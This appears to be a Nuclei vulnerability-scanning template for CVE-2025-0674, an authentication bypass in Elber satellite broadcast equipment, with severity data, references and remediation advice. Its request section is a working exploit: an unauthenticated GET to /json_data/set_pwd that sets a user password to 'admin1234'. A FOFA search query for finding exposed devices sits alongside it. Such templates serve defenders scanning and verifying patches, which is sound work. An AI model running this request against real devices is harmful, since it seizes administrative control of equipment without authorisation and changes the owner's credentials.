id: CVE-2025-0674 info: name: Elber ESE DVB-S/S2 - Authentication Bypass author: DhiyaneshDK severity: critical description: | Multiple Elber products are affected by an authentication bypass vulnerability which allows unauthorized access to the password management functionality. Attackers can exploit this issue by manipulating the endpoint to overwrite any user's password within the system. remediation: | Apply security patches from Elber or restrict access to the password management endpoints to authorized networks only. impact: | This grants them unauthorized administrative access to protected areas of the application, compromising the device's system security. reference: - https://www.cisa.gov/news-events/ics-advisories/icsa-25-035-03 - https://github.com/eeeeeeeeee-code/POC/blob/main/wpoc/wayber/Elber-Wayber%E6%A8%A1%E6%8B%9F%E6%95%B0%E5%AD%97%E9%9F%B3%E9%A2%91%E5%AF%86%E7%A0%81%E9%87%8D%E7%BD%AE%E6%BC%8F%E6%B4%9E.md?plain=1 - https://nvd.nist.gov/vuln/detail/CVE-2025-0674 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2025-0674 cwe-id: CWE-288 epss-score: 0.03523 epss-percentile: 0.88011 metadata: verified: true max-request: 1 fofa-query: title="Elber Satellite Equipment" || body="www.elber.it" tags: cve,cve2025,auth-bypass,elber,vkev,vuln flow: http(1) && http(2) http: - raw: - | GET /modules/pwd.html HTTP/1.1 Host: {{Hostname}} matchers: - type: word part: body words: - "Manage system Password" internal: true - raw: - | GET /json_data/set_pwd?lev=2&pass=admin1234 HTTP/1.1 Host: {{Hostname}} matchers: - type: word part: body words: - "Apply successfully" # digest: 4b0a00483046022100a19919998882447e24369eae53a865c190898dcab3941458d044fe27e0c4c9ae022100d8f21e67b3e8c6d9b7639d94d005479669b6ab0277cadf5e122027312f0d3e40:922c64590222798bb761d5b6d8e72950